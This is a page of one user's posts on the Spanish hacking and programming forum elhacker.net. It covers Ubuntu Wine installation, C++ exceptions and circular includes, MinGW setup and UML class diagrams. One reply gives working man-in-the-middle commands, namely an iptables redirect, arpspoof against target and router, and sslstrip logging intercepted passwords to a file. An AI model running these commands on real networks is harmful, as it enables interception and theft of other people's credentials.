elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14
41  Sistemas Operativos / GNU/Linux / Re: instalar wine en ubuntu sin conexion en: 22 Mayo 2012, 20:41 pm
Esto te puede servir, si tienes algún problema, pon mas datos, que no das mucha info sobre el caso xD

http://www.ubuntu-es.org/node/12100

Saludos
42  Programación / Programación C/C++ / Re: Problema capturando excepciones en: 8 Marzo 2012, 18:38 pm
Puede que estes recogiendo la excepción en un sitio inadecuado, estas van ascendiendo desde las funciones donde se lanzan hasta el main, por ejemplo:

Si tienes una función 'function', en la cual lanzas una excepción, si tienes el catch para ESE TIPO de excepción en 'function', la capturará ahí, si no, ascenderá hacia la función "padre", por llamarla así, es decir, si desde el main llamas a 'function', la excepción asciende al main, ahora, si ahí la capturas, perfecto, pero si no la capturas ahí, te peta la aplicación ;).

Espero haberme explicado bien :)

Saludos
43  Programación / Programación C/C++ / Re: problemas con ide no se como resolver poo en: 8 Marzo 2012, 18:31 pm
Hola, Una vez que tienes MinGW instalado, tienes que añadir al PATH la dirección C:\MinGW o C:\MinGW\bin, no recuerdo exactamente, una vez ahí, en tu IDE, (yo se hacerlo en Netbeans) seleccionas el compilador que quieras, pero para no quebrarte mucho la cabeza, desinstala el IDE y vuelve a instalarlo para que te coja el compilador automáticamente.

Otra alternativa es instalar Cygwin ;)

Saludos.
44  Seguridad Informática / Hacking / Re: Ataque Man in the middle en: 22 Enero 2012, 10:34 am
Gracias, se hizo lo que se pudo  :D

Saludos
45  Seguridad Informática / Hacking / Re: Internet se desconecta luego de usar ettercap en: 21 Enero 2012, 17:37 pm
Hola!! en teoría, poniendo a 1 el ip_forward, no debería darte problemas, aún así, yo hago lo siguiente:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000

arpspoof -i interface -t iptarget iprouter
arpspoof -i interface -t iprouter iptarget

sslstrip -w fichero.txt

Si solo quieres passwords del protocolo https (protocolo SsL), no te hace falta ettercap, el mismo sslstrip te las almacena en 'fichero.txt'

Saludos ;)
46  Seguridad Informática / Hacking / Ataque Man in the middle en: 21 Enero 2012, 17:23 pm
Hola!! Un compañero de uni y yo hemos estado indagando sobre el ataque man in the middle en redes locales, se lo dejo por si les interesa  :).

Aceptamos dudas y sugerencias  :rolleyes:


Saludos y... Happy hacking!! ;-)


Archivo:

http://www.gigasize.com/get/nps7rw4ns3d

NOTA: hay algunos comandos que empiezan por mayúscula, se me pasó quitarla, por supuesto es en minúscula, Saludos.
47  Programación / Programación C/C++ / Re: Inclusión mutua de clases C++ en: 26 Diciembre 2011, 17:30 pm
Bueno, ya resolví el problema, les comento:

En A.h, antes de class A, había que poner:

Class B;   //había que declarar la clase para que la de abajo la reconociera :)

y viceversa con la otra clase. Saludos..


48  Programación / Programación C/C++ / Inclusión mutua de clases C++ en: 26 Diciembre 2011, 12:12 pm
Hola, se me acaba de presentar un problemilla :), aver si me pueden responder:

Tengo dos clases, A y B, la clase A incluye a la B, y la clase B incluye a la A, resultado... salta el compilador;

En la clase A tengo una lista de objetos de la clase B, y en la clase B, tengo un puntero a objeto de la clase A, de este modo:

A.h
Código
  1. #include "B.h"
  2.  
  3. class A{
  4.  list<B > objetos;
  5. }
  6.  

B.h
Código
  1. #include "A.h"
  2.  
  3. class B{
  4.  A* pointer;
  5. }
  6.  

¿Me podrían ayudar a resolverlo?   Muchas gracias de antemano ;)
49  Programación / Programación General / Re: Condicionales en diagrama de clase en: 24 Octubre 2011, 21:43 pm
Hola Miguel, gracias por la respuesta, no es un diagrama de flujo, es un diagrama de clases, pero la duda ya está resuelta, no puedo representar un 'if' en este tipo de diagramas, consulté y no puedes representar detalles de implementación del software :)

Muchas gracias de todas formas


Saludos.
50  Programación / Programación General / Condicionales en diagrama de clase en: 22 Octubre 2011, 11:46 am
Hola!! bueno creo que este es el sitio adecuado para esta pregunta, si no, pido a los mods que lo cambien a la adecuada, bueno, la cuestión es que estoy con el diagrama de clases de un proyecto, y no se representar condiciones en el diagrama de clase, he pedido ayuda a Dr. Google pero se ve que no lo he hecho bien xD.

Bueno, les pongo un ejemplo:

Imaginen las siguientes clases:

Cliente
Restaurante
Reserva
Web


El cliente hace una reserva al restaurante a través de la web, si el cliente confirma la reserva, la web le muestra un mapa de su mesa, si no la confirma, pongamos otra cosa jeje, el caso es, como represento ese condicional  "si el cliente confirma, la web muestra un mapa de su mesa" en un diagrama de clases?

Muchas gracias de antemano ;)
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines